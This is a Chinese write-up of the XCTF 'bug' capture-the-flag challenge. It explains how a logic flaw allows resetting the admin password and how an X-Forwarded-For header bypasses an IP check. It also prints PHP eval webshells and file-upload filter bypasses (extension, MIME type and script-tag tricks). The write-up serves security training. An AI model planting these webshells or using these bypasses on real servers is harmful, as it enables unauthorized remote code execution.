XCTF-高手进阶区:bug
題目:
進去后發(fā)現(xiàn)如下所示:
我注冊了一個peak賬號,登錄后顯示如下:
經(jīng)過一番測試,發(fā)現(xiàn)Manage需要admin權(quán)限:
如何獲取admin權(quán)限呢?利用修改密碼界面的邏輯漏洞,修改admin的密碼,如下:
再次點擊Manage會出現(xiàn)
我們使用XFF繞過IP限制
X-Forwarded-For:簡稱XFF頭,它代表客戶端,也就是HTTP的請求端真實的IP
嘗試上傳一個peak.php文件:<?php @eval($_REQUEST[peak]);?>
發(fā)現(xiàn)無法上傳,被判斷為php文件,通過在上傳時可以抓包,可以發(fā)現(xiàn)是后端驗證,嘗試00截斷:
再猜測可能是過濾代碼中的特殊字符,例如?,那我們將peak.php內(nèi)容修改為:<script language="php">@eval($_REQUEST[peak])</script>,再次上傳,00截斷也不ok,依舊未果,還能咋辦?
最后發(fā)現(xiàn)php4和php5可以上傳但返回不是圖像…好!那我們就修改MIME
修改文件名為peak.jpg,結(jié)果不行!那就是peak.php的內(nèi)容有問題,目標服務(wù)器有過濾,那我們繼續(xù)使用<script language="php">@eval($_REQUEST[peak])</script>來繞過,得到flag
注:經(jīng)測試
(1)如果你的peak.php5文件內(nèi)容中沒有任何php內(nèi)容還不行,例:
(2)文件必須能被php解析執(zhí)行
總結(jié):這題主要考查
- 對邏輯漏洞的認識
- 對敏感目錄的猜測
- 文件上傳的繞過(需要注意的是,有時候常用的一句話木馬,有可能會被過濾!)
- 繞過要求:MIME類型是圖片;文件名能被php解析執(zhí)行;文件內(nèi)容既要是php文件,而且你php文件中的內(nèi)容還不能這么明顯,難搞哦
總結(jié)
以上是生活随笔為你收集整理的XCTF-高手进阶区:bug的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 手机怎么管理路由器 如何管理家里路由器
- 下一篇: XCTF-高手进阶区:ics-07